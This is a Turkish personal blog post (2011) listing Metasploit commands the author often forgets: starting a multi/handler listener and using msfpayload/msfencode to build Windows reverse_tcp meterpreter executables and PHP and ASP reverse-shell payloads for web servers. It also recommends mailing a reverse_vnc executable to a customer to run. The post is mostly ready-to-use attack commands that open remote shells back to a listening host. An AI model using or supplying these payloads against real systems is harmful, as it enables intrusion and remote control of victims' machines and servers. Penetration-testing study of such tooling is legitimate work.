14 Eylül 2011 Çarşamba

Çok Sık Unuttuğum Metasploit Komutları

Sanıırm artık hafızam eskisi kadar kuvvetli değil. Bu nedenle pek çok şeyi hatırlamakta zorlanıyorum. Lazım olduğunda hatırlayamadığım bu nasıl kullanılıyordu diye cebelleşmek zorunda kaldığım bir kaç metasploit komutunu buraya not alayım diye düşündüm...

Dinleme Moduna Geçmek
Aşağıdaki komutla metasploit dinleme moduna geçerek gelecek bağlantıları beklemeye başlayacaktır. Çalışan payload işlevini yakalayıp kullanabilmek için gereklidir...

msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.2.124 LPORT=9999 E
 
Payload için EXE oluşturma

Payload kodu ikilik hale getirilip Windows sistemlerde çalıbilecek exe dosyasına dönüştürülür. Bir şekilde bu bu exe dosyası çalıştırıldığında Payload işlevi yürütülecektir...

msfpayload windows/x64/meterpreter/reverse_tcp LHOST=192.168.5.124 LPORT=8888 X > /root/test.exe

Uzun süre önce bu yöntemi, bilgisayarıyla arası iyi olmayan romanyadaki bir müşterimizin teamvewer gibi bir aracı çalıştıramıyor olması nedeniyle kullanmış ve Reverse VNC ile bilgisayarına bağlanarak kullandığı yazılım ile ilgi destek vermiştim. Olur ya teamviewer gibi araçları kurup çalıştıramayan birileri olursa, reverse_vnc payloadu için bir exe dosyası oluşturun ve bu exe dosyasını gönderip çalıştırmalarını isteyin...


Payload PHP oluşturma
Aşağıdaki gibi bir komutla Payload kodunun php dosyası şeklinde oluşturulmasını sağlayabiliriz.

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.5.124 LPORT=8888 R > /root/test.php

Bu yöntem özellikle PHP dosyalarını işletebilen web sunucuları için ideal bir yöntem olabilir. Oluşan PHP dosyası web sunucunda çalıştığında seçilen Payload çalışarak görevini yerine getirecektir...


Payload ASP oluşturma
Benzer şekilde Payload kodunun ASP versiyonunu üretmek ve IIS gibi ASP betiklerini yürütebilen web sunucularında seçilen Payload işlevinin yürütülmesini sağlamak mümkündür. Bunun için aşağıdaki gibi bir komut kullanılabilir...

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.5.124 LPORT=8888 R | msfencode -t asp -o test.asp

Hiç yorum yok:

Yorum Gönder